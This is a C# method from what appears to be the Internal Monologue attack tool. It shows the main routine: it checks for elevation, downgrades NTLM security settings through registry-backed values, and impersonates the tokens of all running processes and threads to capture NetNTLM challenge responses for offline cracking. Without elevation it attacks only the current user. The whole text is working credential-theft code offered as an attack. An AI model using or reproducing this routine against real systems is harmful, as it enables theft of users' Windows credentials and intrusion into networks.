public InternalMonologueConsole Go() { var console = new InternalMonologueConsole(); //Extended NetNTLM Downgrade and impersonation can only work if the current process is elevated isElevated = IsElevated(); if (isElevated) { if (verbose == true) { console.AddConsole("Running elevated\n"); } object oldValue_LMCompatibilityLevel = null; object oldValue_NtlmMinClientSec = null; object oldValue_RestrictSendingNTLMTraffic = null; if (downgrade == true) { if (verbose == true) { console.AddConsole("Performing NTLM Downgrade\n"); } //Perform an Extended NetNTLM Downgrade and store the current values to restore them later ExtendedNTLMDowngrade(out oldValue_LMCompatibilityLevel, out oldValue_NtlmMinClientSec, out oldValue_RestrictSendingNTLMTraffic); } if (impersonate == true) { if (verbose == true) { console.AddConsole("Starting impersonation\n"); } foreach (Process process in Process.GetProcesses()) { var response = HandleProcess(process, challenge, verbose); if (response != null) { console.AddConsole(string.Format("{0}\n", response.Output())); console.AddResponses(response.Responses); } if (!threads) { continue; } foreach (ProcessThread thread in process.Threads) { response = HandleThread(thread, challenge, verbose); if (response == null) { continue; } console.AddConsole(string.Format("{0}\n", response.Output())); console.AddResponses(response.Responses); } } } else { if (verbose == true) { console.AddConsole("Performing attack on current user only (no impersonation)\n"); } var response = InternalMonologueForCurrentUser(challenge); console.AddResponse(response); console.AddConsole(string.Format("{0}\n", response.ToString())); } if (downgrade == true && restore == true) { if (verbose == true) { console.AddConsole("Restoring NTLM values\n"); } //Undo changes made in the Extended NetNTLM Downgrade NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic); } } else { //If the process is not elevated, skip downgrade and impersonation and only perform an Internal Monologue Attack for the current user if (verbose == true) { console.AddConsole("Not elevated. Performing attack with current NTLM settings on current user\n"); } var response = InternalMonologueForCurrentUser(challenge); console.AddResponse(response); console.AddConsole(string.Format("{0}\n", response.ToString())); } #if DEBUG Console.WriteLine(console.Output()); #endif return(console); }